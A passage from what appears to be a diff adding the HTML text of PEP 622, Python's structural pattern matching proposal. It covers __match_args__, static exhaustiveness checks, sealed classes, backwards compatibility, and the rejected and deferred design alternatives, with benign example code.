  • If the __match_args__ attribute is absent on the matched class, +and one or more positional item appears in a match, +TypeError is also raised. We don’t fall back on +using __slots__ or __annotations__ – “In the face of ambiguity, +refuse the temptation to guess.”
  • +
  • If there are any match-by-keyword items the keywords are looked up +as attributes on the subject. If the lookup succeeds the value is +matched against the corresponding sub-pattern. If the lookup fails, +the match fails.
  • +
+

Such a protocol favors simplicity of implementation over flexibility and +performance. For other considered alternatives, see extended matching.

+

For the most commonly-matched built-in types (bool, +bytearray, bytes, dict, float, +frozenset, int, list, set, str, and tuple), a +single positional sub-pattern is allowed to be passed to +the call. Rather than being matched against any particular attribute +on the subject, it is instead matched against the subject itself. This +creates behavior that is useful and intuitive for these objects:

+
    +
  • bool(False) matches False (but not 0).
  • +
  • tuple((0, 1, 2)) matches (0, 1, 2) (but not [0, 1, 2]).
  • +
  • int(i) matches any int and binds it to the name i.
  • +
+
+
+

Overlapping sub-patterns

+

Certain classes of overlapping matches are detected at +runtime and will raise exceptions. In addition to basic checks +described in the previous subsection:

+
    +
  • The interpreter will check that two match items are not targeting the same +attribute, for example Point2d(1, 2, y=3) is an error.
  • +
  • It will also check that a mapping pattern does not attempt to match +the same key more than once.
  • +
+
+
+

Special attribute __match_args__

+

The __match_args__ attribute is always looked up on the type +object named in the pattern. If present, it must be a list or tuple +of strings naming the allowed positional arguments.

+

In deciding what names should be available for matching, the +recommended practice is that class patterns should be the mirror of +construction; that is, the set of available names and their types +should resemble the arguments to __init__().

+

Only match-by-name will work by default, and classes should define +__match_args__ as a class attribute if they would like to support +match-by-position. Additionally, dataclasses and named tuples will +support match-by-position out of the box. See below for more details.

+
+
+

Exceptions and side effects

+

While matching each case, the match statement may trigger execution of other +functions (for example __getitem__(), __len__() or +a property). Almost every exception caused by those propagates outside of the +match statement normally. The only case where an exception is not propagated is +an AttributeError raised while trying to lookup an attribute while matching +attributes of a Class Pattern; that case results in just a matching failure, +and the rest of the statement proceeds normally.

+

The only side-effect carried on explicitly by the matching process is the binding of +names. However, the process relies on attribute access, +instance checks, len(), equality and item access on the subject and some of +its components. It also evaluates constant value patterns and the left side of +class patterns. While none of those typically create any side-effects, some of +these objects could. This proposal intentionally leaves out any specification +of what methods are called or how many times. User code relying on that +behavior should be considered buggy.

+
+
+

The standard library

+

To facilitate the use of pattern matching, several changes will be made to +the standard library:

+
    +
  • Namedtuples and dataclasses will have auto-generated __match_args__.
  • +
  • For dataclasses the order of attributes in the generated __match_args__ +will be the same as the order of corresponding arguments in the generated +__init__() method. This includes the situations where attributes are +inherited from a superclass.
  • +
+

In addition, a systematic effort will be put into going through +existing standard library classes and adding __match_args__ where +it looks beneficial.

+
+
+
+

Static checkers specification

+
+

Exhaustiveness checks

+

From a reliability perspective, experience shows that missing a case when +dealing with a set of possible data values leads to hard to debug issues, +thus forcing people to add safety asserts like this:

+
def get_first(data: Union[int, list[int]]) -> int:
+    if isinstance(data, list) and data:
+        return data[0]
+    elif isinstance(data, int):
+        return data
+    else:
+        assert False, "should never get here"
+
+
+

PEP 484 specifies that static type checkers should support exhaustiveness in +conditional checks with respect to enum values. PEP 586 later generalized this +requirement to literal types.

+

This PEP further generalizes this requirement to +arbitrary patterns. A typical situation where this applies is matching an +expression with a union type:

+
def classify(val: Union[int, Tuple[int, int], List[int]]) -> str:
+    match val:
+        case [x, y] if x > 0 and y > 0:
+            return f"A pair of {x} and {y}"
+        case [x, *other]:
+            return f"A sequence starting with {x}"
+        case int():
+            return f"Some integer"
+        # Type-checking error: some cases unhandled.
+
+
+

The exhaustiveness checks should also apply where both pattern matching +and enum values are combined:

+
from enum import Enum
+from typing import Union
+
+class Level(Enum):
+    BASIC = 1
+    ADVANCED = 2
+    PRO = 3
+
+class User:
+    name: str
+    level: Level
+
+class Admin:
+    name: str
+
+account: Union[User, Admin]
+
+match account:
+    case Admin(name=name) | User(name=name, level=Level.PRO):
+        ...
+    case User(level=Level.ADVANCED):
+        ...
+    # Type-checking error: basic user unhandled
+
+
+

Obviously, no Matchable protocol (in terms of PEP 544) is needed, since +every class is matchable and therefore is subject to the checks specified +above.

+
+
+

Sealed classes as algebraic data types

+

Quite often it is desirable to apply exhaustiveness to a set of classes without +defining ad-hoc union types, which is itself fragile if a class is missing in +the union definition. A design pattern where a group of record-like classes is +combined into a union is popular in other languages that support pattern +matching and is known under a name of algebraic data types.

+

We propose to add a special decorator class @sealed to the typing +module, that will have no effect at runtime, but will indicate to static +type checkers that all subclasses (direct and indirect) of this class should +be defined in the same module as the base class.

+

The idea is that since all subclasses are known, the type checker can treat +the sealed base class as a union of all its subclasses. Together with +dataclasses this allows a clean and safe support of algebraic data types +in Python. Consider this example:

+
from dataclasses import dataclass
+from typing import sealed
+
+@sealed
+class Node:
+    ...
+
+class Expression(Node):
+    ...
+
+class Statement(Node):
+    ...
+
+@dataclass
+class Name(Expression):
+    name: str
+
+@dataclass
+class Operation(Expression):
+    left: Expression
+    op: str
+    right: Expression
+
+@dataclass
+class Assignment(Statement):
+    target: str
+    value: Expression
+
+@dataclass
+class Print(Statement):
+    value: Expression
+
+
+

With such definition, a type checker can safely treat Node as +Union[Name, Operation, Assignment, Print], and also safely treat e.g. +Expression as Union[Name, Operation]. So this will result in a type +checking error in the below snippet, because Name is not handled (and type +checker can give a useful error message):

+
def dump(node: Node) -> str:
+    match node:
+        case Assignment(target, value):
+            return f"{target} = {dump(value)}"
+        case Print(value):
+            return f"print({dump(value)})"
+        case Operation(left, op, right):
+            return f"({dump(left)} {op} {dump(right)})"
+
+
+
+
+

Type erasure

+

Class patterns are subject to runtime type erasure. Namely, although one +can define a type alias IntQueue = Queue[int] so that a pattern like +IntQueue() is syntactically valid, type checkers should reject such a +match:

+
queue: Union[Queue[int], Queue[str]]
+match queue:
+    case IntQueue():  # Type-checking error here
+        ...
+
+
+

Note that the above snippet actually fails at runtime with the current +implementation of generic classes in the typing module, as well as +with builtin generic classes in the recently accepted PEP 585, because +they prohibit isinstance checks.

+

To clarify, generic classes are not prohibited in general from participating +in pattern matching, just that their type parameters can’t be explicitly +specified. It is still fine if sub-patterns or literals bind the type +variables. For example:

+
from typing import Generic, TypeVar, Union
+
+T = TypeVar('T')
+
+class Result(Generic[T]):
+    first: T
+    other: list[T]
+
+result: Union[Result[int], Result[str]]
+
+match result:
+    case Result(first=int()):
+        ...  # Type of result is Result[int] here
+    case Result(other=["foo", "bar", *rest]):
+        ...  # Type of result is Result[str] here
+
+
+
+
+

Note about constants

+

The fact that a capture pattern is always an assignment target may create unwanted +consequences when a user by mistake tries to “match” a value against +a constant instead of using the constant value pattern. As a result, at +runtime such a match will always succeed and moreover override the value of +the constant. It is important therefore that static type checkers warn about +such situations. For example:

+
from typing import Final
+
+MAX_INT: Final = 2 ** 64
+
+value = 0
+
+match value:
+    case MAX_INT:  # Type-checking error here: cannot assign to final name
+        print("Got big number")
+    case _:
+        print("Something else")
+
+
+

Note that the CPython reference implementation also generates a +SyntaxWarning message for this case.

+
+
+

Precise type checking of star matches

+

Type checkers should perform precise type checking of star items in pattern +matching giving them either a heterogeneous list[T] type, or +a TypedDict type as specified by PEP 589. For example:

+
stuff: Tuple[int, str, str, float]
+
+match stuff:
+    case a, *b, 0.5:
+        # Here a is int and b is list[str]
+        ...
+
+
+
+
+
+

Performance Considerations

+

Ideally, a match statement should have good runtime performance compared +to an equivalent chain of if-statements. Although the history of programming +languages is rife with examples of new features which increased engineer +productivity at the expense of additional CPU cycles, it would be +unfortunate if the benefits of match were counter-balanced by a significant +overall decrease in runtime performance.

+

Although this PEP does not specify any particular implementation strategy, +a few words about the prototype implementation and how it attempts to +maximize performance are in order.

+

Basically, the prototype implementation transforms all of the match +statement syntax into equivalent if/else blocks - or more accurately, into +Python byte codes that have the same effect. In other words, all of the +logic for testing instance types, sequence lengths, mapping keys and +so on are inlined in place of the match.

+

This is not the only possible strategy, nor is it necessarily the best. +For example, the instance checks could be memoized, especially +if there are multiple instances of the same class type but with different +arguments in a single match statement. It is also theoretically +possible for a future implementation to process case clauses or sub-patterns in +parallel using a decision tree rather than testing them one by one.

+
+
+

Backwards Compatibility

+

This PEP is fully backwards compatible: the match and case +keywords are proposed to be (and stay!) soft keywords, so their use as +variable, function, class, module or attribute names is not impeded at +all.

+

This is important because match is the name of a popular and +well-known function and method in the re module, which we have no +desire to break or deprecate.

+

The difference between hard and soft keywords is that hard keywords +are always reserved words, even in positions where they make no +sense (e.g. x = class + 1), while soft keywords only get a special +meaning in context. Since PEP 617 the parser backtracks, that means that on +different attempts to parse a code fragment it could interpret a soft +keyword differently.

+

For example, suppose the parser encounters the following input:

+
match [x, y]:
+
+
+

The parser first attempts to parse this as an expression statement. +It interprets match as a NAME token, and then considers [x, +y] to be a double subscript. It then encounters the colon and has +to backtrack, since an expression statement cannot be followed by a +colon. The parser then backtracks to the start of the line and finds +that match is a soft keyword allowed in this position. It then +considers [x, y] to be a list expression. The colon then is just +what the parser expected, and the parse succeeds.

+
+
+

Impacts on third-party tools

+

There are a lot of tools in the Python ecosystem that operate on Python +source code: linters, syntax highlighters, auto-formatters, and IDEs. These +will all need to be updated to include awareness of the match statement.

+

In general, these tools fall into one of two categories:

+

Shallow parsers don’t try to understand the full syntax of Python, but +instead scan the source code for specific known patterns. IDEs, such as Visual +Studio Code, Emacs and TextMate, tend to fall in this category, since frequently +the source code is invalid while being edited, and a strict approach to parsing +would fail.

+

For these kinds of tools, adding knowledge of a new keyword is relatively +easy, just an addition to a table, or perhaps modification of a regular +expression.

+

Deep parsers understand the complete syntax of Python. An example of this +is the auto-formatter Black. A particular requirement with these kinds of +tools is that they not only need to understand the syntax of the current version +of Python, but older versions of Python as well.

+

The match statement uses a soft keyword, and it is one of the first major +Python features to take advantage of the capabilities of the new PEG parser. This +means that third-party parsers which are not ‘PEG-compatible’ will have a hard +time with the new syntax.

+

It has been noted that a number of these third-party tools leverage common parsing +libraries (Black for example uses a fork of the lib2to3 parser). It may be helpful +to identify widely used parsing libraries (such as parso and libCST) +and upgrade them to be PEG compatible.

+

However, since this work would need to be done not only for the match statement, +but for any new Python syntax that leverages the capabilities of the PEG parser, +it is considered out of scope for this PEP. (Although it is suggested that this +would make a fine Summer of Code project.)

+
+
+

Reference Implementation

+

A feature-complete CPython implementation is available on +GitHub.

+

An interactive playground +based on the above implementation was created using Binder and Jupyter.

+
+
+

Example Code

+

A small collection of example code is +available on GitHub.

+
+
+

Rejected Ideas

+

This general idea has been floating around for a pretty long time, and many +back and forth decisions were made. Here we summarize many alternative +paths that were taken but eventually abandoned.

+
+

Don’t do this, pattern matching is hard to learn

+

In our opinion, the proposed pattern matching is not more difficult than +adding isinstance() and getattr() to iterable unpacking. Also, we +believe the proposed syntax significantly improves readability for a wide +range of code patterns, by allowing to express what one wants to do, rather +than how to do it. We hope the few real code snippets we included in the PEP +above illustrate this comparison well enough. For more real code examples +and their translations see Ref. [1].

+
+
+

Don’t do this, use existing method dispatching mechanisms

+

We recognize that some of the use cases for the match statement overlap +with what can be done with traditional object-oriented programming (OOP) design +techniques using class inheritance. The ability to choose alternate +behaviors based on testing the runtime type of a match subject might +even seem heretical to strict OOP purists.

+

However, Python has always been a language that embraces a variety of +programming styles and paradigms. Classic Python design idioms such as +“duck”-typing go beyond the traditional OOP model.

+

We believe that there are important use cases where the use of match results +in a cleaner and more maintainable architecture. These use cases tend to +be characterized by a number of features:

+
    +
  • Algorithms which cut across traditional lines of data encapsulation. If an +algorithm is processing heterogeneous elements of different types (such as +evaluating or transforming an abstract syntax tree, or doing algebraic +manipulation of mathematical symbols), forcing the user to implement +the algorithm as individual methods on each element type results in +logic that is smeared across the entire codebase instead of being neatly +localized in one place.
  • +
  • Program architectures where the set of possible data types is relatively +stable, but there is an ever-expanding set of operations to be performed +on those data types. Doing this in a strict OOP fashion requires constantly +adding new methods to both the base class and subclasses to support the new +methods, “polluting” the base class with lots of very specialized method +definitions, and causing widespread disruption and churn in the code. By +contrast, in a match-based dispatch, adding a new behavior merely +involves writing a new match statement.
  • +
  • OOP also does not handle dispatching based on the shape of an object, such +as the length of a tuple, or the presence of an attribute – instead any such +dispatching decision must be encoded into the object’s type. Shape-based +dispatching is particularly interesting when it comes to handling “duck”-typed +objects.
  • +
+

Where OOP is clearly superior is in the opposite case: where the set of possible +operations is relatively stable and well-defined, but there is an ever-growing +set of data types to operate on. A classic example of this is UI widget toolkits, +where there is a fixed set of interaction types (repaint, mouse click, keypress, +and so on), but the set of widget types is constantly expanding as developers +invent new and creative user interaction styles. Adding a new kind of widget +is a simple matter of writing a new subclass, whereas with a match-based approach +you end up having to add a new case clause to many widespread match statements. +We therefore don’t recommend using match in such a situation.

+
+
+

Allow more flexible assignment targets instead

+

There was an idea to instead just generalize the iterable unpacking to much +more general assignment targets, instead of adding a new kind of statement. +This concept is known in some other languages as “irrefutable matches”. We +decided not to do this because inspection of real-life potential use cases +showed that in vast majority of cases destructuring is related to an if +condition. Also many of those are grouped in a series of exclusive choices.

+
+
+

Make it an expression

+

In most other languages pattern matching is represented by an expression, not +statement. But making it an expression would be inconsistent with other +syntactic choices in Python. All decision making logic is expressed almost +exclusively in statements, so we decided to not deviate from this.

+
+
+

Use a hard keyword

+

There were options to make match a hard keyword, or choose a different +keyword. Although using a hard keyword would simplify life for simple-minded +syntax highlighters, we decided not to use hard keyword for several reasons:

+
    +
  • Most importantly, the new parser doesn’t require us to do this. Unlike with +async that caused hardships with being a soft keyword for few releases, +here we can make match a permanent soft keyword.
  • +
  • match is so commonly used in existing code, that it would break almost +every existing program and will put a burden to fix code on many people who +may not even benefit from the new syntax.
  • +
  • It is hard to find an alternative keyword that would not be commonly used +in existing programs as an identifier, and would still clearly reflect the +meaning of the statement.
  • +
+
+
+

Use as or | instead of case for case clauses

+

The pattern matching proposed here is a combination of multi-branch control +flow (in line with switch in Algol-derived languages or cond in Lisp) +and object-deconstruction as found in functional languages. While the proposed +keyword case highlights the multi-branch aspect, alternative keywords such +as as would equally be possible, highlighting the deconstruction aspect. +as or with, for instance, also have the advantage of already being +keywords in Python. However, since case as a keyword can only occur as a +leading keyword inside a match statement, it is easy for a parser to +distinguish between its use as a keyword or as a variable.

+

Other variants would use a symbol like | or =>, or go entirely without +special marker.

+

Since Python is a statement-oriented language in the tradition of Algol, and as +each composite statement starts with an identifying keyword, case seemed to +be most in line with Python’s style and traditions.

+
+
+

Use a flat indentation scheme

+

There was an idea to use an alternative indentation scheme, for example where +every case clause would not be indented with respect to the initial match +part:

+
match expression:
+case pattern_1:
+    ...
+case pattern_2:
+    ...
+
+
+

The motivation is that although flat indentation saves some horizontal space, +it may look awkward to an eye of a Python programmer, because everywhere else +colon is followed by an indent. This will also complicate life for +simple-minded code editors. Finally, the horizontal space issue can be +alleviated by allowing “half-indent” (i.e. two spaces instead of four) for +match statements.

+

In sample programs using match, written as part of the development of this +PEP, a noticeable improvement in code brevity is observed, more than making up +for the additional indentation level.

+

Another proposal considered was to use flat indentation but put the +expression on the line after match:, like this:

+
match:
+    expression
+case pattern_1:
+    ...
+case pattern_2:
+    ...
+
+
+

This was ultimately rejected because the first block would be a +novelty in Python’s grammar: a block whose only content is a single +expression rather than a sequence of statements.

+
+
+

Alternatives for constant value pattern

+

This is probably the trickiest item. Matching against some pre-defined +constants is very common, but the dynamic nature of Python also makes it +ambiguous with capture patterns. Five other alternatives were considered:

+
    +
  • Use some implicit rules. For example, if a name was defined in the global +scope, then it refers to a constant, rather than representing a +capture pattern:
    # Here, the name "spam" must be defined in the global scope (and
    +# not shadowed locally). "side" must be local.
    +
    +match entree[-1]:
    +    case spam: ...  # Compares entree[-1] == spam.
    +    case side: ...  # Assigns side = entree[-1].
    +
    +
    +

    This however can cause surprises and action at a distance if someone +defines an unrelated coinciding name before the match statement.

    +
  • +
  • Use a rule based on the case of a name. In particular, if the name +starts with a lowercase letter it would be a capture pattern, while if +it starts with uppercase it would refer to a constant:
    match entree[-1]:
    +    case SPAM: ...  # Compares entree[-1] == SPAM.
    +    case side: ...  # Assigns side = entree[-1].
    +
    +
    +

    This works well with the recommendations for naming constants from +PEP 8. The main objection is that there’s no other part of core +Python where the case of a name is semantically significant. +In addition, Python allows identifiers to use different scripts, +many of which (e.g. CJK) don’t have a case distinction.

    +
  • +
  • Use extra parentheses to indicate lookup semantics for a given name. For +example:
    match entree[-1]:
    +    case (spam): ...  # Compares entree[-1] == spam.
    +    case side: ...    # Assigns side = entree[-1].
    +
    +
    +

    This may be a viable option, but it can create some visual noise if used +often. Also honestly it looks pretty unusual, especially in nested contexts.

    +

    This also has the problem that we may want or need parentheses to +disambiguate grouping in patterns, e.g. in Point(x, y=(y := +complex())).

    +
  • +
  • Introduce a special symbol, for example ., ?, $, or ^ to +indicate that a given name is a value to be matched against, not +to be assigned to. An earlier version of this proposal used a +leading-dot rule:
    match entree[-1]:
    +    case .spam: ...  # Compares entree[-1] == spam.
    +    case side: ...   # Assigns side = entree[-1].
    +
    +
    +

    While potentially useful, it introduces strange-looking new syntax +without making the pattern syntax any more expressive. Indeed, +named constants can be made to work with the existing rules by +converting them to Enum types, or enclosing them in their own +namespace (considered by the authors to be one honking great idea):

    +
    match entree[-1]:
    +    case Sides.SPAM: ...  # Compares entree[-1] == Sides.SPAM.
    +    case side: ...        # Assigns side = entree[-1].
    +
    +
    +

    If needed, the leading-dot rule (or a similar variant) could be +added back later with no backward-compatibility issues.

    +
  • +
  • There was also an idea to make lookup semantics the default, and require +$ or ? to be used in capture patterns:
    match entree[-1]:
    +    case spam: ...   # Compares entree[-1] == spam.
    +    case side?: ...  # Assigns side = entree[-1].
    +
    +
    +

    There are a few issues with this:

    +
      +
    • Capture patterns are more common in typical code, so it is +undesirable to require special syntax for them.
    • +
    • The authors are not aware of any other language that adorns +captures in this way.
    • +
    • None of the proposed syntaxes have any precedent in Python; +no other place in Python that binds names (e.g. import, +def, for) uses special marker syntax.
    • +
    • It would break the syntactic parallels of the current grammar:
      match coords:
      +    case ($x, $y):
      +        return Point(x, y)  # Why not "Point($x, $y)"?
      +
      +
      +
    • +
    +
  • +
+

In the end, these alternatives were rejected because of the mentioned drawbacks.

+
+
+

Disallow float literals in patterns

+

Because of the inexactness of floats, an early version of this proposal +did not allow floating-point constants to be used as match patterns. Part +of the justification for this prohibition is that Rust does this.

+

However, during implementation, it was discovered that distinguishing between +float values and other types required extra code in the VM that would slow +matches generally. Given that Python and Rust are very different languages +with different user bases and underlying philosophies, it was felt that +allowing float literals would not cause too much harm, and would be less +surprising to users.

+
+
+

Range matching patterns

+

This would allow patterns such as 1...6. However, there are a host of +ambiguities:

+
    +
  • Is the range open, half-open, or closed? (I.e. is 6 included in the +above example or not?)
  • +
  • Does the range match a single number, or a range object?
  • +
  • Range matching is often used for character ranges (‘a’…’z’) but that +won’t work in Python since there’s no character data type, just strings.
  • +
  • Range matching can be a significant performance optimization if you can +pre-build a jump table, but that’s not generally possible in Python due +to the fact that names can be dynamically rebound.
  • +
+

Rather than creating a special-case syntax for ranges, it was decided +that allowing custom pattern objects (InRange(0, 6)) would be more flexible +and less ambiguous; however those ideas have been postponed for the time +being (See deferred ideas).

+
+
+

Use dispatch dict semantics for matches

+

Implementations for classic switch statement sometimes use a pre-computed +hash table instead of a chained equality comparisons to gain some performance. +In the context of match statement this is technically also possible for +matches against literal patterns. However, having subtly different semantics +for different kinds of patterns would be too surprising for potentially +modest performance win.

+

We can still experiment with possible performance optimizations in this +direction if they will not cause semantic differences.

+
+
+

Use continue and break in case clauses.

+

Another rejected proposal was to define new meanings for continue +and break inside of match, which would have the following behavior:

+
    +
  • continue would exit the current case clause and continue matching +at the next case clause.
  • +
  • break would exit the match statement.
  • +
+

However, there is a serious drawback to this proposal: if the match statement +is nested inside of a loop, the meanings of continue and break are now +changed. This may cause unexpected behavior during refactorings; also, an +argument can be made that there are other means to get the same behavior (such +as using guard conditions), and that in practice it’s likely that the existing +behavior of continue and break are far more useful.

+
+
+

AND (&) patterns

+

This proposal defines an OR-pattern (|) to match one of several alternates; +why not also an AND-pattern (&)? Especially given that some other languages +(F# for example) support this.

+

However, it’s not clear how useful this would be. The semantics for matching +dictionaries, objects and sequences already incorporates an implicit ‘and’: all +attributes and elements mentioned must be present for the match to succeed. Guard +conditions can also support many of the use cases that a hypothetical ‘and’ +operator would be used for.

+

In the end, it was decided that this would make the syntax more complex without +adding a significant benefit.

+
+
+

Negative match patterns

+

A negation of a match pattern using the operator ! as a prefix would match +exactly if the pattern itself does not match. For instance, !(3 | 4) +would match anything except 3 or 4.

+

This was rejected because there is documented evidence that this feature +is rarely useful (in languages which support it) or used as double negation +!! to control variable scopes and prevent variable bindings (which does +not apply to Python). It can also be simulated using guard conditions.

+
+
+

Check exhaustiveness at runtime

+

The question is what to do if no case clause has a matching pattern, and +there is no default case. An earlier version of the proposal specified that +the behavior in this case would be to throw an exception rather than +silently falling through.

+

The arguments back and forth were many, but in the end the EIBTI (Explicit +Is Better Than Implicit) argument won out: it’s better to have the programmer +explicitly throw an exception if that is the behavior they want.

+

For cases such as sealed classes and enums, where the patterns are all known +to be members of a discrete set, static checkers can warn about missing +patterns.

+
+
+

Type annotations for pattern variables

+

The proposal was to combine patterns with type annotations:

+
match x:
+    case [a: int, b: str]: print(f"An int {a} and a string {b}:)
+    case [a: int, b: int, c: int]: print(f"Three ints", a, b, c)
+    ...
+
+
+

This idea has a lot of problems. For one, the colon can only +be used inside of brackets or parens, otherwise the syntax becomes +ambiguous. And because Python disallows isinstance() checks +on generic types, type annotations containing generics will not +work as expected.

+
+
+

Allow *rest in class patterns

+

It was proposed to allow *rest in a class pattern, giving a +variable to be bound to all positional arguments at once (similar to +its use in unpacking assignments). It would provide some symmetry +with sequence patterns. But it might be confused with a feature to +provide the values for all positional arguments at once. And there +seems to be no practical need for it, so it was scrapped. (It could +easily be added at a later stage if a need arises.)

+
+
+

Disallow _.a in constant value patterns

+

The first public draft said that the initial name in a constant value +pattern must not be _ because _ has a special meaning in +pattern matching, so this would be invalid:

+
case _.a: ...
+
+
+

(However, a._ would be legal and load the attribute with name +_ of the object a as usual.)

+

There was some pushback against this on python-dev (some people have a +legitimate use for _ as an important global variable, esp. in +i18n) and the only reason for this prohibition was to prevent some +user confusion. But it’s not the hill to die on.

+
+
+

Use some other token as wildcard

+

It has been proposed to use ... (i.e., the ellipsis token) or +* (star) as a wildcard. However, both these look as if an +arbitrary number of items is omitted:

+
case [a, ..., z]: ...
+case [a, *, z]: ...
+
+
+

Both look like the would match a sequence of at two or more items, +capturing the first and last values.

+

In addition, if * were to be used as the wildcard character, we +would have to come up with some other way to capture the rest of a +sequence, currently spelled like this:

+
case [first, second, *rest]: ...
+
+
+

Using an ellipsis would also be more confusing in documentation and +examples, where ... is routinely used to indicate something +obvious or irrelevant. (Yes, this would also be an argument against +the other uses of ... in Python, but that water is already under +the bridge.)

+

Another proposal was to use ?. This could be acceptable, although +it would require modifying the tokenizer.

+

Also, _ is already used +as a throwaway target in other contexts, and this use is pretty +similar. This example is from difflib.py in the stdlib:

+
for tag, _, _, j1, j2 in group: ...
+
+
+

Perhaps the most convincing argument is that _ is used as the +wildcard in every other language we’ve looked at supporting pattern +matching: C#, Elixir, Erlang, F#, Haskell, Mathematica, OCaml, Ruby, +Rust, Scala, and Swift. Now, in general, we should not be concerned +too much with what another language does, since Python is clearly +different from all these languages. However, if there is such an +overwhelming and strong consensus, Python should not go out of its way +to do something completely different – particularly given that _ +works well in Python and is already in use as a throwaway target.

+

Note that _ is not assigned to by patterns – this avoids +conflicts with the use of _ as a marker for translatable strings +and an alias for gettext.gettext, as recommended by the +gettext module documentation.

+
+
+

Use some other syntax instead of | for OR patterns

+

A few alternatives to using | to separate the alternatives in OR +patterns have been proposed. Instead of:

+
case 401|403|404:
+    print("Some HTTP error")
+
+
+

the following proposals have been fielded:

+
    +
  • Use a comma:
    case 401, 403, 404:
    +  print("Some HTTP error")
    +
    +
    +

    This looks too much like a tuple – we would have to find a +different way to spell tuples, and the construct would have to be +parenthesized inside the argument list of a class pattern. In +general, commas already have many different meanings in Python, we +shouldn’t add more.

    +
  • +
  • Allow stacked cases:
    case 401:
    +case 403:
    +case 404:
    +  print("Some HTTP error")
    +
    +
    +

    This is how this would be done in C, using its fall-through +semantics for cases. However, we don’t want to mislead people into +thinking that match/case uses fall-through semantics (which +are a common source of bugs in C). Also, this would be a novel +indentation pattern, which might make it harder to support in IDEs +and such (it would break the simple rule “add an indentation level +after a line ending in a colon”). Finally, this wouldn’t support +OR patterns nested inside other patterns.

    +
  • +
  • Use case in followed by a comma-separated list:
    case in 401, 403, 404:
    +  print("Some HTTP error")
    +
    +
    +

    This wouldn’t work for OR patterns nested inside other patterns, +like:

    +
    case Point(0|1, 0|1):
    +    print("A corner of the unit square")
    +
    +
    +
  • +
  • Use the or keyword:
    case 401 or 403 or 404:
    +    print("Some HTTP error")
    +
    +
    +

    This could work, and the readability is not too different from using +|. Some users expressed a preference for or because they +associate | with bitwise OR. However:

    +
      +
    1. Many other languages that have pattern matching use | (the +list includes Elixir, Erlang, F#, Mathematica, OCaml, Ruby, Rust, +and Scala).
    2. +
    3. | is shorter, which may contribute to the readability of +nested patterns like Point(0|1, 0|1).
    4. +
    5. Some people mistakenly believe that | has the wrong priority; +but since patterns don’t support other operators it has the same +priority as in expressions.
    6. +
    7. Python users use or very frequently, and may build an +impression that it is strongly associated with Boolean +short-circuiting.
    8. +
    9. | is used between alternatives in regular expressions +and in EBNF grammars (like Python’s own).
    10. +
    11. | not just used for bitwise OR – it’s used for set unions, +dict merging (PEP 584) and is being considered as an +alternative to typing.Union (PEP 604).
    12. +
    13. | works better as a visual separator, especially between +strings. Compare:
      case "spam" or "eggs" or "cheese":
      +
      +
      +

      to:

      +
      case "spam" | "eggs" | "cheese":
      +
      +
      +
    14. +
    +
  • +
+
+
+

Add an else clause

+

We decided not to add an else clause for several reasons.

+
    +
  • It is redundant, since we already have case _:
  • +
  • There will forever be confusion about the indentation level of the +else: – should it align with the list of cases or with the +match keyword?
  • +
  • Completionist arguments like “every other statement has one” are +false – only those statements have an else clause where it adds +new functionality.
  • +
+
+
+
+

Deferred Ideas

+

There were a number of proposals to extend the matching syntax that we +decided to postpone for possible future PEP. These fall into the realm of +“cool idea but not essential”, and it was felt that it might be better to +acquire some real-world data on how the match statement will be used in +practice before moving forward with some of these proposals.

+

Note that in each case, the idea was judged to be a “two-way door”, +meaning that there should be no backwards-compatibility issues with adding +these features later.

+
+

One-off syntax variant

+

While inspecting some code-bases that may benefit the most from the proposed +syntax, it was found that single clause matches would be used relatively often, +mostly for various special-casing. In other languages this is supported in +the form of one-off matches. We proposed to support such one-off matches too:

+
if match value as pattern [and guard]:
+    ...
+
+
+

or, alternatively, without the if:

+
match value as pattern [if guard]:
+    ...
+
+
+

as equivalent to the following expansion:

+
match value:
+    case pattern [if guard]:
+        ...
+
+
+

To illustrate how this will benefit readability, consider this (slightly +simplified) snippet from real code:

+
if isinstance(node, CallExpr):
+    if (isinstance(node.callee, NameExpr) and len(node.args) == 1 and
+            isinstance(node.args[0], NameExpr)):
+        call = node.callee.name
+        arg = node.args[0].name
+        ...  # Continue special-casing 'call' and 'arg'
+...  # Follow with common code
+
+
+

This can be rewritten in a more straightforward way as:

+
if match node as CallExpr(callee=NameExpr(name=call), args=[NameExpr(name=arg)]):
+    ...  # Continue special-casing 'call' and 'arg'
+...  # Follow with common code
+
+
+

This one-off form would not allow elif match statements, as it was only +meant to handle a single pattern case. It was intended to be special case +of a match statement, not a special case of an if statement:

+
if match value_1 as patter_1 [and guard_1]:
+    ...
+elif match value_2 as pattern_2 [and guard_2]:  # Not allowed
+    ...
+elif match value_3 as pattern_3 [and guard_3]:  # Not allowed
+    ...
+else:  # Also not allowed
+    ...
+
+
+

This would defeat the purpose of one-off matches as a complement to exhaustive +full matches - it’s better and clearer to use a full match in this case.

+

Similarly, if not match would not be allowed, since match ... as ... is not +an expression. Nor do we propose a while match construct present in some languages +with pattern matching, since although it may be handy, it will likely be used +rarely.

+
+
+

Other pattern-based constructions

+

Many other languages supporting pattern-matching use it as a basis for multiple +language constructs, including a matching operator, a generalized form +of assignment, a filter for loops, a method for synchronizing communication, +or specialized if statements. Some of these were mentioned in the discussion +of the first draft. Another question asked was why this particular form (joining +binding and conditional selection) was chosen while other forms were not.

+

Introducing more uses of patterns would be too bold and premature given the +experience we have using patterns, and would make this proposal too +complicated. The statement as presented provides a form of the feature that +is sufficiently general to be useful while being self-contained, and without +having a massive impact on the syntax and semantics of the language as a whole.

+

After some experience with this feature, the community may have a better +feeling for what other uses of pattern matching could be valuable in Python.

+
+
+

Algebraic matching of repeated names

+

A technique occasionally seen in functional languages like Erlang and Elixir is +to use a match variable multiple times in the same pattern:

+
match value:
+    case Point(x, x):
+        print("Point is on a diagonal!")
+
+
+

The idea here is that the first appearance of x would bind the value +to the name, and subsequent occurrences would verify that the incoming +value was equal to the value previously bound. If the value was not equal, +the match would fail.

+

However, there are a number of subtleties involved with mixing load-store +semantics for capture patterns. For the moment, we decided to make repeated +use of names within the same pattern an error; we can always relax this +restriction later without affecting backwards compatibility.

+

Note that you can use the same name more than once in alternate choices:

+
match value:
+    case x | [x]:
+        # etc.
+
+
+
+
+

Custom matching protocol

+

During the initial design discussions for this PEP, there were a lot of ideas +thrown around about custom matchers. There were a couple of motivations for +this:

+
    +
  • Some classes might want to expose a different set of “matchable” names +than the actual class properties.
  • +
  • Some classes might have properties that are expensive to calculate, and +therefore shouldn’t be evaluated unless the match pattern actually needed +access to them.
  • +
  • There were ideas for exotic matchers such as IsInstance(), +InRange(), RegexMatchingGroup() and so on.
  • +
  • In order for built-in types and standard library classes to be able +to support matching in a reasonable and intuitive way, it was believed +that these types would need to implement special matching logic.
  • +
+

